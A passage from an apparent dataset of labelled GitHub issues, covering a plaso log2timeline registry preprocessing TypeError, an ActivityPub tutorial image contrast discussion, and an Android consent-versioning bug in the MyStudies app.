2020-02-06 09:52:07,763 [DEBUG] (MainProcess) PID:101 <windows> setting environment variable: systemroot to: "\WINNT"
2020-02-06 09:52:07,769 [DEBUG] (MainProcess) PID:101 <manager> Running file system preprocessor plugin: WindowsEnvironmentVariableWinDir
2020-02-06 09:52:07,773 [DEBUG] (MainProcess) PID:101 <windows> setting environment variable: windir to: "\WINNT"
2020-02-06 09:52:07,778 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsEnvironmentVariableAllUsersProfile
2020-02-06 09:52:08,449 [DEBUG] (MainProcess) PID:101 <windows> setting environment variable: allusersprofile to: "All Users"
2020-02-06 09:52:08,451 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsAvailableTimeZones
2020-02-06 09:52:08,492 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsCodePage
2020-02-06 09:52:09,203 [DEBUG] (MainProcess) PID:101 <manager> Running Windows Registry preprocessor plugin: WindowsComputerName
root@7e56f81805b2:/tmp# log2timeline.py --version
plaso - log2timeline version 20200121
```
If it helps, `type(value_data)` at this point is `pyregf.multi_string`
Environment is the `log2timeline/plaso:20200121` docker image.
| process | preprocessing fails with windowshostnameplugin i got a image that fails to process with the following exception shell root tmp py d status view linear test plaso tmp image vmdk mainprocess pid determined data location usr share plaso mainprocess pid determined artifact definitions path usr share artifacts checking availability and versions of dependencies source path tmp image vmdk source type storage media image processing time processing started traceback most recent call last file usr bin py line in if not main file usr bin py line in main tool extracteventsfromsources file usr lib dist packages plaso cli tool py line in extracteventsfromsources self preprocesssources extraction engine file usr lib dist packages plaso cli extraction tool py line in preprocesssources resolver context self resolver context file usr lib dist packages plaso engine engine py line in preprocesssources self knowledge base file usr lib dist packages plaso preprocessors manager py line in runplugins artifacts registry knowledge base searcher file usr lib dist packages plaso preprocessors manager py line in collectfromwindowsregistry preprocess plugin collect knowledge base artifact definition searcher file usr lib dist packages plaso preprocessors interface py line in collect self parsekey knowledge base registry key value name file usr lib dist packages plaso preprocessors interface py line in parsekey self parsevaluedata knowledge base value object file usr lib dist packages plaso preprocessors windows py line in parsevaluedata type value data self artifact definition name typeerror unsupported format string passed to type format root tmp zcat log gz mainprocess pid starting preprocessing mainprocess pid running file system preprocessor plugin linuxhostnamefile mainprocess pid running file system preprocessor plugin linuxdistributionrelease mainprocess pid running file system preprocessor plugin linuxissuefile mainprocess pid running file system preprocessor plugin 
linuxlsbrelease mainprocess pid running file system preprocessor plugin linuxsystemdosrelease mainprocess pid running file system preprocessor plugin linuxlocaltime mainprocess pid running file system preprocessor plugin linuxpasswdfile mainprocess pid running file system preprocessor plugin macossystemconfigurationpreferencesplistfile mainprocess pid running file system preprocessor plugin macoskeyboardlayoutplistfile mainprocess pid running file system preprocessor plugin macossystemversionplistfile mainprocess pid running file system preprocessor plugin macoslocaltime mainprocess pid running file system preprocessor plugin macosuserpasswordhashesplistfiles mainprocess pid running file system preprocessor plugin windowsenvironmentvariablesystemroot mainprocess pid setting environment variable systemroot to winnt mainprocess pid running file system preprocessor plugin windowsenvironmentvariablewindir mainprocess pid setting environment variable windir to winnt mainprocess pid running windows registry preprocessor plugin windowsenvironmentvariableallusersprofile mainprocess pid setting environment variable allusersprofile to all users mainprocess pid running windows registry preprocessor plugin windowsavailabletimezones mainprocess pid running windows registry preprocessor plugin windowscodepage mainprocess pid running windows registry preprocessor plugin windowscomputername root tmp py version plaso version if it helps type value data at this point is pyregf multi string environment is the plaso docker image | 1 |
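The `TypeError` in the plaso record above is a generic Python pitfall rather than anything registry-specific: passing a class object through a `{0:s}` format spec ends up in `type.__format__`, which rejects any non-empty format string. A minimal sketch reproducing it outside plaso — the `MultiString` class here is a hypothetical stand-in for `pyregf.multi_string`, and the format call only approximates the logging call at `windows.py` line 266:

```python
# Minimal reproduction of the TypeError from the plaso traceback above.
# Any class object triggers the same failure when pushed through a
# '{0:s}' format spec, because type.__format__ (inherited from
# object.__format__) rejects non-empty format strings.

class MultiString:  # hypothetical stand-in for pyregf.multi_string
    pass

value_data = MultiString()

try:
    # Roughly what the failing call in windows.py does:
    message = 'unsupported value data type: {0:s}'.format(type(value_data))
except TypeError as error:
    message = 'format failed: {0!s}'.format(error)

# The usual fix: use the !s conversion (or wrap the type in str()) so the
# type object is stringified before any format spec is applied.
fixed = 'unsupported value data type: {0!s}'.format(type(value_data))

print(message)
print(fixed)
```

With the `!s` conversion the same call succeeds, which is the one-character change this kind of bug typically needs.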
4,075 | 7,010,261,510 | IssuesEvent | 2017-12-19 22:26:11 | w3c/activitypub | https://api.github.com/repos/w3c/activitypub | opened | Illustration contrast | Editorial (would not change implementations) Needs Process Help | We received some feedback that the contrast on the images for the ActivityPub tutorial was too low. I'm hesitant about changing these far from @mray's original design; I think they were very intentional about their decisions in the original graphics so that the following properties were true:
- The colors helped convey contextual information that's useful in being able to read the images
- The color scheme, and level of contrast, leads the characters to be somewhat racially ambiguous, which I think is a win for diversity reasons; if we try to up the contrast too much, the characters will look white, and I think that would be a loss of another kind.
- mray also built their images based on my original ascii art; I originally designed those ascii art images in such a way that they are not *required* to understand the surrounding text; they merely convey some additional useful information.
Nonetheless, I understand where the accessibility concern comes from. In the latest Editor's Draft, I've adjusted the images to both a) try to improve contrast and b) try to preserve mray's original design. This is the best I was able to do... see here:
- [original](https://www.w3.org/TR/activitypub/illustration/tutorial-1.png)
- [adjusted](https://w3c.github.io/activitypub/illustration/tutorial-1.png)
If folks are fine with this, I'd be happy moving these to be the official images used, though I think we'd need process help to get the images changed at this point. | 1.0 | Illustration contrast - We received some feedback that the contrast on the images for the ActivityPub tutorial was too low. I'm hesitant about changing these far from @mray's original design; I think they were very intentional about their decisions in the original graphics so that the following properties were true:
- The colors helped convey contextual information that's useful in being able to read the images
- The color scheme, and level of contrast, leads the characters to be somewhat racially ambiguous, which I think is a win for diversity reasons; if we try to up the contrast too much, the characters will look white, and I think that would be a loss of another kind.
- mray also built their images based on my original ascii art; I originally designed those ascii art images in such a way that they are not *required* to understand the surrounding text; they merely convey some additional useful information.
Nonetheless, I understand where the accessibility concern comes from. In the latest Editor's Draft, I've adjusted the images to both a) try to improve contrast and b) try to preserve mray's original design. This is the best I was able to do... see here:
- [original](https://www.w3.org/TR/activitypub/illustration/tutorial-1.png)
- [adjusted](https://w3c.github.io/activitypub/illustration/tutorial-1.png)
If folks are fine with this, I'd be happy moving these to be the official images used, though I think we'd need process help to get the images changed at this point. | process | illustration contrast we received some feedback that the contrast on the images for the activitypub tutorial was too low i m hesitant about changing these far from mray s original design i think they were very intentional about their decisions in the original graphics so that the following properties were true the colors helped convey contextual information that s useful in being able to read the images the color scheme and level of contrast leads the characters to be somewhat racially ambiguous which i think is a win for diversity reasons if we try to up the contrast too much the characters will look white and i think that would be a loss of another kind mray also build their images based on my original ascii art i originally designed those ascii art images in such a way that they are not required to understand the surrounding text they mearly convey some additional useful information nonetheless i understand where the accessibilty concern comes from in the latest editor s draft i ve adjusted the issues to both a try to improve contrast and b try to preserve mray s original design this is the best i was able to do it see here if folks are fine with this i d be happy moving these to be the official images used though i think we d need process help to get the images changed at this point | 1 |
12,938 | 15,302,440,711 | IssuesEvent | 2021-02-24 14:44:45 | yuta252/startlens_ios_camera | https://api.github.com/repos/yuta252/startlens_ios_camera | closed | Implement authentication feature | dev process | ## Overview
Implement a login screen using JWT token authentication
## Changes
- Create the login screen
- Style the input form with the TextFieldEffects pod
- Handle backend API requests with Alamofire
- Save the JWT token to UserDefaults on successful authentication
## References
- [cocoaControls](https://www.cocoacontrols.com/)
- [TextFieldEffects, beautiful effects for text input](https://dev.classmethod.jp/articles/swift_text_field_effects/) | 1.0 | Implement authentication feature - ## Overview
Implement a login screen using JWT token authentication
## Changes
- Create the login screen
- Style the input form with the TextFieldEffects pod
- Handle backend API requests with Alamofire
- Save the JWT token to UserDefaults on successful authentication
## References
- [cocoaControls](https://www.cocoacontrols.com/)
- [TextFieldEffects, beautiful effects for text input](https://dev.classmethod.jp/articles/swift_text_field_effects/) | process | implement authentication feature overview implement a login screen using jwt token authentication changes create the login screen style the input form with the textfieldeffects pod handle backend api requests with alamofire save the jwt token to userdefaults on successful authentication references | 1
139,363 | 20,828,559,791 | IssuesEvent | 2022-03-19 03:21:51 | kubermatic/dashboard | https://api.github.com/repos/kubermatic/dashboard | closed | Update vSphere logo | kind/design sig/ui | I think vSphere logo was updated some time ago, see https://docs.vmware.com/.
~~I am not able to find any official page with resource though.~~ It requires login to access https://www.vmware.com/brand.html?ref=/brand/portal/guidelines/logo.html.
<img width="184" alt="Zrzut ekranu 2022-03-14 o 11 51 07" src="https://user-images.githubusercontent.com/2823399/158157830-35566561-1fe6-47ca-ae33-f4e89b4f9fbf.png">
| 1.0 | Update vSphere logo - I think vSphere logo was updated some time ago, see https://docs.vmware.com/.
~~I am not able to find any official page with resource though.~~ It requires login to access https://www.vmware.com/brand.html?ref=/brand/portal/guidelines/logo.html.
<img width="184" alt="Zrzut ekranu 2022-03-14 o 11 51 07" src="https://user-images.githubusercontent.com/2823399/158157830-35566561-1fe6-47ca-ae33-f4e89b4f9fbf.png">
| non_process | update vsphere logo i think vsphere logo was updated some time ago see i am not able to find any official page with resource though it requires login to access img width alt zrzut ekranu o src | 0 |
17,624 | 23,443,408,019 | IssuesEvent | 2022-08-15 17:04:44 | pytorch/pytorch | https://api.github.com/repos/pytorch/pytorch | closed | Multi-process Pipe() | module: multiprocessing triaged | ### 🚀 The feature, motivation and pitch
May I ask when the multi-process pipe will be released, and is there any test version that can be used? Thanks for any help and feedback.
### Alternatives
_No response_
### Additional context
_No response_
cc @VitalyFedyunin | 1.0 | Multi-process Pipe() - ### 🚀 The feature, motivation and pitch
May I ask when the multi-process pipe will be released, and is there any test version that can be used? Thanks for any help and feedback.
### Alternatives
_No response_
### Additional context
_No response_
cc @VitalyFedyunin | process | multi process pipe 🚀 the feature motivation and pitch may i ask when the multi process pipe will be released and is there any test version that can be used thanks for any help and feedback alternatives no response additional context no response cc vitalyfedyunin | 1 |
230,654 | 17,632,232,374 | IssuesEvent | 2021-08-19 09:24:31 | hashicorp/terraform-provider-azurerm | https://api.github.com/repos/hashicorp/terraform-provider-azurerm | closed | Documentation is not clear about azurerm provider definition for version 2.0.0 and features | enhancement question documentation | Hi, I spent a few hours trying to understand why code as simple as the following was not working with the latest azurerm provider:
```
variable "AzureRegion" {
type = string
}
variable "ResourceGroupName" {
type = string
}
# Azure Resource Group
resource "azurerm_resource_group" "Terra-RG-Stan1" {
name = var.ResourceGroupName
location = var.AzureRegion
}
```
If I run `terraform plan` and then type the values of AzureRegion and ResourceGroupName, I get the following error message: **Error: "features": required field is not set**
Pinning the azurerm provider to a 1.x version using the following code solves the issue:
```
provider "azurerm" {
version = "=1.44.0"
}
```
Trying to change to version 2.0.0 doesn't solve the issue:
```
provider "azurerm" {
version = "=2.0.0"
}
```
Adding features {} to the provider block solves the issue:
```
provider "azurerm" {
version = "=2.0.0"
**features {}**
}
```
**So one thing to improve is probably to explain that it is now mandatory to define the azurerm provider block in Terraform code** at the beginning of the documentation https://www.terraform.io/docs/providers/azurerm/index.html and to insist on the **required features {}** | 1.0 | Documentation is not clear about azurerm provider definition for version 2.0.0 and features - Hi, I spent a few hours trying to understand why code as simple as the following was not working with the latest azurerm provider:
```
variable "AzureRegion" {
type = string
}
variable "ResourceGroupName" {
type = string
}
# Azure Resource Group
resource "azurerm_resource_group" "Terra-RG-Stan1" {
name = var.ResourceGroupName
location = var.AzureRegion
}
```
If I run `terraform plan` and then type the values of AzureRegion and ResourceGroupName, I get the following error message: **Error: "features": required field is not set**
Pinning the azurerm provider to a 1.x version using the following code solves the issue:
```
provider "azurerm" {
version = "=1.44.0"
}
```
Trying to change to version 2.0.0 doesn't solve the issue:
```
provider "azurerm" {
version = "=2.0.0"
}
```
Adding features {} to the provider block solves the issue:
```
provider "azurerm" {
version = "=2.0.0"
**features {}**
}
```
**So one thing to improve is probably to explain that it is now mandatory to define the azurerm provider block in Terraform code** at the beginning of the documentation https://www.terraform.io/docs/providers/azurerm/index.html and to insist on the **required features {}** | non_process | documentation is not clear about azurerm provider definition for version and features hi i spend few hours try to understand why a so simple code like the following was not working with the lastest azurerm provider variable azureregion type string variable resourcegroupname type string azure resource group resource azurerm resource group terra rg name var resourcegroupname location var azureregion if i run terraform plan and then type the values of azureregion and resourcegroupname i get the following error message error features required field is not set fixing the azurerm provider to a x version using the following code solve the issue provider azurerm version try to change with version doesn t solve the issue provider azurerm version adding feature to provider block solve the issue provider azurerm version features so one thing to improve is probably to explain that now it s mandatory to define azurem provider block in terraform code in beginning of documentation and insist about required features | 0
14,976 | 18,496,739,115 | IssuesEvent | 2021-10-19 09:28:19 | influxdata/telegraf | https://api.github.com/repos/influxdata/telegraf | opened | Starlark pop not working as documented | bug area/starlark plugin/processor |
### Relevant telegraf.conf:
Use this as Starlark code:
```starlark
units = int(metric.tags.pop("units", "0"))
```
### System info:
Telegraf 1.20.2 (git: HEAD f721f53d)
### Steps to reproduce:
1. Use starlark processor with above code snippet
2. Send metric not having the `units` tag.
### Expected behavior:
No error and `units` should be `0`.
### Actual behavior:
> Error in pop: pop: key must be of type ‘str’
| 1.0 | Starlark pop not working as documented -
### Relevant telegraf.conf:
Use this as Starlark code:
```starlark
units = int(metric.tags.pop("units", "0"))
```
### System info:
Telegraf 1.20.2 (git: HEAD f721f53d)
### Steps to reproduce:
1. Use starlark processor with above code snippet
2. Send metric not having the `units` tag.
### Expected behavior:
No error and `units` should be `0`.
### Actual behavior:
> Error in pop: pop: key must be of type ‘str’
| process | starlark pop not working as documented relevant telegraf conf use this as starlark code starlark units int metric tags pop units system info telegraf git head steps to reproduce use starlark processor with above code snippet send metric not having the units tag expected behavior no error and units should be actual behavior error in pop pop key must be of type ‘str’ | 1 |
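The error in the Starlark record above suggests telegraf's Starlark `pop` may not handle the default argument the way the snippet assumes. For contrast, a sketch of the Python `dict.pop` semantics the snippet expects, plus a membership-check workaround that avoids relying on `pop`'s second argument (plain Python here, not telegraf's actual Starlark runtime):

```python
# Semantics the Starlark snippet expects, demonstrated with a plain Python dict.
tags = {"host": "server01"}  # a metric with no "units" tag

# dict.pop with a default never raises for a missing key.
units = int(tags.pop("units", "0"))

# Workaround pattern that avoids relying on pop's default argument entirely:
units_fallback = int(tags.pop("units")) if "units" in tags else 0
```

Both forms leave the remaining tags untouched when the key is absent.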
3,258 | 6,336,403,473 | IssuesEvent | 2017-07-26 21:00:59 | wpninjas/ninja-forms | https://api.github.com/repos/wpninjas/ninja-forms | closed | Update filter that Saves data to the Database | ADMIN: Submissions DIFFICULTY: Easy FRONT: Processing PRIORITY: High Security VALUE: Modern | Example: includes/Fields/CreditCardNumber.php line 27 | 1.0 | Update filter that Saves data to the Database - Example: includes/Fields/CreditCardNumber.php line 27 | process | update filter that saves data to the database example includes fields creditcardnumber php line | 1 |
21,398 | 29,202,233,016 | IssuesEvent | 2023-05-21 00:37:53 | devssa/onde-codar-em-salvador | https://api.github.com/repos/devssa/onde-codar-em-salvador | closed | [Remoto] React Native Developer (Pleno) na Coodesh | SALVADOR FRONT-END PJ PLENO REST TYPESCRIPT REACT MOBILE REQUISITOS IOS REMOTO GITHUB UMA C QUALIDADE APIs RESTFUL GEOPROCESSAMENTO MANUTENÇÃO NEGÓCIOS ARQUITETURA DE SISTEMAS COLETA DE DADOS SUPORTE DASHBOARD Stale | ## Descrição da vaga:
Esta é uma vaga de um parceiro da plataforma Coodesh, ao candidatar-se você terá acesso as informações completas sobre a empresa e benefícios.
Fique atento ao redirecionamento que vai te levar para uma url [https://coodesh.com](https://coodesh.com/vagas/react-native-developer-pleno-134354289?utm_source=github&utm_medium=devssa-onde-codar-em-salvador&modal=open) com o pop-up personalizado de candidatura. 👋
<p>A <strong>Geobyte</strong> está em busca de <strong><ins>React Native Developer</ins></strong> para compor seu time!</p>
<p><strong>Quem somos nós:</strong></p>
<p>Somos uma empresa de desenvolvimento de software, focada em soluções ambientais utilizando geoprocessamento. Nossos principais clientes são ONG’s e consultorias ambientais. Trabalhamos sempre em conjunto com nossos parceiros, estabelecendo uma comunicação transparente para entregar os melhores resultados, através de muito esforço e dedicação.</p>
<p><strong>Sobre a oportunidade </strong></p>
<p>O desenvolvedor Mobile deve trabalhar em conjunto com a equipe de desenvolvimento e com a equipe de negócios para aplicar soluções técnicas escaláveis, confiáveis e adequadas aos produtos. Para isso é necessário que o profissional tenha o conhecimento técnico, seja responsável e criativo.</p>
<p><strong>Responsabilidades:</strong></p>
<ul>
<li>Analisar o código existente em busca de falhas e problemas;</li>
<li>Documentar os métodos e o código com clareza e interagir regularmente com as equipes de gerenciamento e suporte técnico;</li>
<li>Construir e manter recursos para nossos aplicativos com programação React Native;</li>
<li>Fornecer software de alta qualidade, escalável e altamente testado; </li>
<li>Publicar os aplicativos nas lojas Android e iOS;</li>
<li>Participar do processo criativo do produto, interagindo com pessoas de diferentes backgrounds, propondo e questionando;</li>
<li>Ter curiosidade intelectual, gostar de explorar novas tecnologias e melhorar a arquitetura de sistemas; </li>
<li>Responsabilidade por criar e organizar a estrutura de projeto de uma aplicação mobile completa; </li>
<li>Trabalhar em conjunto com um time multidisciplinar e focado em encontrar a melhor, mais estável e escalável tecnologia; </li>
<li>Auxiliar no desenvolvimento de soluções front-end modernas, escaláveis e de fácil manutenção.</li>
</ul>
## Geobyte:
<p>A Geobyte é uma empresa especializada em tecnologia, meio ambiente e Geoprocessamento que busca, por meio do seu conhecimento, agregar valor às soluções dos clientes. Além de dominar as tecnologias necessárias para desenvolver as soluções, possuímos amplo conhecimento em diversas áreas do meio ambiente e geoprocessamento, que auxilia seus clientes a encontrar as melhores alternativas para seu projeto. </p>
<p>Possuímos projetos elaborados em diversos segmentos relacionados ao meio ambiente, como análise de cobertura e uso do solo, análise e mapeamento social, criação de diversos sistemas webgis, aplicativo mobile para coleta de dados off-line em campo e posterior alimentação do sistema web, geração de relatórios e dashboard personalidades além de análises e filtros espaciais. Trabalhamos com empresas privadas, em consultorias ambientais, mineradores e outros. Setor público, com projetos nas secretarias de meio ambiente de Minas Gerais e Espírito Santo. Terceiro setor, em ONGs e Observatórios ambientais.</p><a href='https://coodesh.com/empresas/geobyte'>Veja mais no site</a>
## Habilidades:
- React Native
- Typescript
- REST APIs
## Local:
100% Remoto
## Requisitos:
- Conhecimento sobre React Native;
- Vivência com pelo menos um gerenciamento de estado;
- Familiaridade com TypeScript;
- Conhecimento em Watermelondb;
- Experiência no desenvolvimento de aplicações inteiras a partir do zero;
- Forte experiência com controle de versão;
- Experiência de desenvolvimento em React Native com TS;
- Conhecimento do ciclo de vida de uma plataforma;
- Consumo de API REST/RESTful.
## Como se candidatar:
Candidatar-se exclusivamente através da plataforma Coodesh no link a seguir: [React Native Developer (Pleno) na Geobyte](https://coodesh.com/vagas/react-native-developer-pleno-134354289?utm_source=github&utm_medium=devssa-onde-codar-em-salvador&modal=open)
Após candidatar-se via plataforma Coodesh e validar o seu login, você poderá acompanhar e receber todas as interações do processo por lá. Utilize a opção **Pedir Feedback** entre uma etapa e outra na vaga que se candidatou. Isso fará com que a pessoa **Recruiter** responsável pelo processo na empresa receba a notificação.
## Labels
#### Alocação
Remoto
#### Regime
PJ
#### Categoria
Mobile | 1.0 | [Remoto] React Native Developer (Pleno) na Coodesh - ## Descrição da vaga:
Esta é uma vaga de um parceiro da plataforma Coodesh, ao candidatar-se você terá acesso as informações completas sobre a empresa e benefícios.
Fique atento ao redirecionamento que vai te levar para uma url [https://coodesh.com](https://coodesh.com/vagas/react-native-developer-pleno-134354289?utm_source=github&utm_medium=devssa-onde-codar-em-salvador&modal=open) com o pop-up personalizado de candidatura. 👋
<p>A <strong>Geobyte</strong> está em busca de <strong><ins>React Native Developer</ins></strong> para compor seu time!</p>
<p><strong>Quem somos nós:</strong></p>
<p>Somos uma empresa de desenvolvimento de software, focada em soluções ambientais utilizando geoprocessamento. Nossos principais clientes são ONG’s e consultorias ambientais. Trabalhamos sempre em conjunto com nossos parceiros, estabelecendo uma comunicação transparente para entregar os melhores resultados, através de muito esforço e dedicação.</p>
<p><strong>Sobre a oportunidade </strong></p>
<p>O desenvolvedor Mobile deve trabalhar em conjunto com a equipe de desenvolvimento e com a equipe de negócios para aplicar soluções técnicas escaláveis, confiáveis e adequadas aos produtos. Para isso é necessário que o profissional tenha o conhecimento técnico, seja responsável e criativo.</p>
<p><strong>Responsabilidades:</strong></p>
<ul>
<li>Analisar o código existente em busca de falhas e problemas;</li>
<li>Documentar os métodos e o código com clareza e interagir regularmente com as equipes de gerenciamento e suporte técnico;</li>
<li>Construir e manter recursos para nossos aplicativos com programação React Native;</li>
<li>Fornecer software de alta qualidade, escalável e altamente testado; </li>
<li>Publicar os aplicativos nas lojas Android e iOS;</li>
<li>Participar do processo criativo do produto, interagindo com pessoas de diferentes backgrounds, propondo e questionando;</li>
<li>Ter curiosidade intelectual, gostar de explorar novas tecnologias e melhorar a arquitetura de sistemas; </li>
<li>Responsabilidade por criar e organizar a estrutura de projeto de uma aplicação mobile completa; </li>
<li>Trabalhar em conjunto com um time multidisciplinar e focado em encontrar a melhor, mais estável e escalável tecnologia; </li>
<li>Auxiliar no desenvolvimento de soluções front-end modernas, escaláveis e de fácil manutenção.</li>
</ul>
## Geobyte:
<p>A Geobyte é uma empresa especializada em tecnologia, meio ambiente e Geoprocessamento que busca, por meio do seu conhecimento, agregar valor às soluções dos clientes. Além de dominar as tecnologias necessárias para desenvolver as soluções, possuímos amplo conhecimento em diversas áreas do meio ambiente e geoprocessamento, que auxilia seus clientes a encontrar as melhores alternativas para seu projeto. </p>
<p>Possuímos projetos elaborados em diversos segmentos relacionados ao meio ambiente, como análise de cobertura e uso do solo, análise e mapeamento social, criação de diversos sistemas webgis, aplicativo mobile para coleta de dados off-line em campo e posterior alimentação do sistema web, geração de relatórios e dashboard personalidades além de análises e filtros espaciais. Trabalhamos com empresas privadas, em consultorias ambientais, mineradores e outros. Setor público, com projetos nas secretarias de meio ambiente de Minas Gerais e Espírito Santo. Terceiro setor, em ONGs e Observatórios ambientais.</p><a href='https://coodesh.com/empresas/geobyte'>Veja mais no site</a>
## Habilidades:
- React Native
- Typescript
- REST APIs
## Local:
100% Remoto
## Requisitos:
- Conhecimento sobre React Native;
- Vivência com pelo menos um gerenciamento de estado;
- Familiaridade com TypeScript;
- Conhecimento em Watermelondb;
- Experiência no desenvolvimento de aplicações inteiras a partir do zero;
- Forte experiência com controle de versão;
- Experiência de desenvolvimento em React Native com TS;
- Conhecimento do ciclo de vida de uma plataforma;
- Consumo de API REST/RESTful.
## Como se candidatar:
Candidatar-se exclusivamente através da plataforma Coodesh no link a seguir: [React Native Developer (Pleno) na Geobyte](https://coodesh.com/vagas/react-native-developer-pleno-134354289?utm_source=github&utm_medium=devssa-onde-codar-em-salvador&modal=open)
Após candidatar-se via plataforma Coodesh e validar o seu login, você poderá acompanhar e receber todas as interações do processo por lá. Utilize a opção **Pedir Feedback** entre uma etapa e outra na vaga que se candidatou. Isso fará com que a pessoa **Recruiter** responsável pelo processo na empresa receba a notificação.
## Labels
#### Alocação
Remoto
#### Regime
PJ
#### Categoria
Mobile | process | react native developer pleno na coodesh descrição da vaga esta é uma vaga de um parceiro da plataforma coodesh ao candidatar se você terá acesso as informações completas sobre a empresa e benefícios fique atento ao redirecionamento que vai te levar para uma url com o pop up personalizado de candidatura 👋 a geobyte está em busca de react native developer para compor seu time quem somos nós somos uma empresa de desenvolvimento de software focada em soluções ambientais utilizando geoprocessamento nossos principais clientes são ong’s e consultorias ambientais trabalhamos sempre em conjunto com nossos parceiros estabelecendo uma comunicação transparente para entregar os melhores resultados através de muito esforço e dedicação sobre a oportunidade o desenvolvedor mobile deve trabalhar em conjunto com a equipe de desenvolvimento e com a equipe de negócios para aplicar soluções técnicas escaláveis confiáveis e adequadas aos produtos para isso é necessário que o profissional tenha o conhecimento técnico seja responsável e criativo responsabilidades analisar o código existente em busca de falhas e problemas documentar os métodos e o código com clareza e interagir regularmente com as equipes de gerenciamento e suporte técnico construir e manter recursos para nossos aplicativos com programação react native fornecer software de alta qualidade escalável e altamente testado nbsp publicar os aplicativos nas lojas androis e ios participar do processo criativo do produto interagindo com pessoas de diferentes backgrounds propondo e questionando ter curiosidade intelectual gostar de explorar novas tecnologias e melhorar a arquitetura de sistemas nbsp responsabilidade por criar e organizar a estrutura de projeto de uma aplicação mobile completa nbsp trabalhar em conjunto com um time multidisciplinar e focado em encontrar a melhor mais estável e escalável tecnologia nbsp auxiliar no desenvolvimento de soluções front end modernas escaláveis e de fácil manutenção 
geobyte a geobyte é uma empresa especializada em tecnologia meio ambiente e geoprocessamento que busca por meio do seu conhecimento agregar valor às soluções dos clientes além de dominar as tecnologias necessárias para desenvolver as soluções possuímos amplo conhecimento em diversas áreas do meio ambiente e geoprocessamento que auxilia seus clientes a encontrar as melhores alternativas para seu projeto nbsp possuímos projetos elaborados em diversos segmentos relacionados ao meio ambiente como análise de cobertura e uso do solo análise e mapeamento social criação de diversos sistemas webgis aplicativo mobile para coleta de dados off line em campo e posterior alimentação do sistema web geração de relatórios e dashboard personalidades além de análises e filtros espaciais trabalhamos com empresas privadas em consultorias ambientais mineradores e outros setor público com projetos nas secretarias de meio ambiente de minas gerais e espírito santo terceiro setor em ongs e observatórios ambientais habilidades react native typescript rest apis local remoto requisitos conhecimento sobre react native vivência com pelo menos um gerenciamento de estado familiaridade com typescript conhecimento em watermelondb experiência no desenvolvimento de aplicações inteiras a partir do zero forte experiência com controle de versão experiência de desenvolvimento em react native com ts conhecimento do ciclo de vida de uma plataforma consumo de api rest restful como se candidatar candidatar se exclusivamente através da plataforma coodesh no link a seguir após candidatar se via plataforma coodesh e validar o seu login você poderá acompanhar e receber todas as interações do processo por lá utilize a opção pedir feedback entre uma etapa e outra na vaga que se candidatou isso fará com que a pessoa recruiter responsável pelo processo na empresa receba a notificação labels alocação remoto regime pj categoria mobile | 1 |
28,162 | 8,101,634,032 | IssuesEvent | 2018-08-12 15:52:06 | SoftEtherVPN/SoftEtherVPN | https://api.github.com/repos/SoftEtherVPN/SoftEtherVPN | closed | clang static analyzer (scan-build) with cmake | build & release | please, could someone have a look at how scan-build can be called from within cmake
(I'm going to have a look myself if I have spare time) | 1.0 | clang static analyzer (scan-build) with cmake - please, could someone have a look at how scan-build can be called from within cmake
(I'm going to have a look by myself if I will have spare time) | non_process | clang static analyzer scan build with cmake please someone have a look how scan build can be called from within cmake i m going to have a look by myself if i will have spare time | 0 |
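To answer the question in the scan-build record above: the conventional approach (a sketch, assuming clang's scan-build is on PATH; exact flags vary by CMake version) is to wrap both the configure step and the build step, so CMake caches the analyzer's compiler wrappers:

```shell
# Configure under scan-build so CMake caches the analyzer's compiler wrappers,
# then build under scan-build to collect the analysis reports.
scan-build cmake -S . -B build
scan-build cmake --build build

# Reports land in a timestamped directory under /tmp by default;
# -o selects an explicit output directory instead:
scan-build -o analysis-reports cmake --build build
```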
21,975 | 30,468,439,400 | IssuesEvent | 2023-07-17 12:06:53 | metabase/metabase | https://api.github.com/repos/metabase/metabase | closed | [MLv2] `:fields :all` should be added by default when creating a join | .Backend .metabase-lib .Team/QueryProcessor :hammer_and_wrench: | This is what MLv1 is doing, we should replicate that behavior by default so the frontend doesn't manually have to call
```ts
withFields(joinClause, "all")
```
every time it creates a join. I had this working in commit https://github.com/metabase/metabase/pull/32028/commits/498365ae462668b9a8c1479becc8d9cf7f9b1818 at one point but ultimately removed that from the PR since it was unrelated to what I was actually trying to fix -- hopefully that can serve as a reference
See also issue #32026 -- `:fields :all` breaks `replace-clause` | 1.0 | [MLv2] `:fields :all` should be added by default when creating a join - This is what MLv1 is doing, we should replicate that behavior by default so the frontend doesn't manually have to call
```ts
withFields(joinClause, "all")
```
every time it creates a join. I had this working in commit https://github.com/metabase/metabase/pull/32028/commits/498365ae462668b9a8c1479becc8d9cf7f9b1818 at one point but ultimately removed that from the PR since it was unrelated to what I was actually trying to fix -- hopefully that can serve as a reference
See also issue #32026 -- `:fields :all` breaks `replace-clause` | process | fields all should be added by default when creating a join this is what is doing we should replicate that behavior by default so the frontend doesn t manually have to call ts withfields joinclause all every time it creates a join i had this working in commit at one point but ultimately removed that from the pr since it was unrelated to what i was actually trying to fix hopefully that can serve as a reference see also issue fields all breaks replace clause | 1 |
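The default requested in the MLv2 record above can be illustrated with a small sketch (hypothetical names, and Python here rather than the TypeScript/Clojure of the actual codebase): the constructor applies `"all"` unless the caller overrides it, so the frontend no longer needs an explicit `withFields(joinClause, "all")` call.

```python
ALL_FIELDS = "all"

def join_clause(table, fields=ALL_FIELDS):
    """Construct a join; fields defaults to 'all' (MLv1-style behavior),
    so callers need not apply with_fields(clause, 'all') themselves."""
    return {"table": table, "fields": fields}

def with_fields(clause, fields):
    """Explicit, non-mutating override, mirroring withFields(joinClause, fields)."""
    return {**clause, "fields": fields}
```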
18,630 | 24,580,308,018 | IssuesEvent | 2022-10-13 15:09:03 | GoogleCloudPlatform/fda-mystudies | https://api.github.com/repos/GoogleCloudPlatform/fda-mystudies | closed | [Android][Consent] Updated consent version is not available in the mobile | Bug Blocker P0 Android Process: Fixed Process: Tested QA Process: Tested dev | Steps:-
1. Login into the Android application[Gateway]
2. Enroll into the study
3. Navigate to Studies list screen
4. Update the consent and enable the **Enforce e-consent flow again for enrolled participants** in E-Consent steps and publish the updates
5. Open the study which is enrolled in the mobile and refresh
A/R:- Updated consent version is not displaying for the user, even though new version is available from SB
E/R:- Updated consent version should be displayed for the user, whenever new version is available from SB
1. Login into the Android application[Gateway]
2. Enroll into the study
3. Navigate to Studies list screen
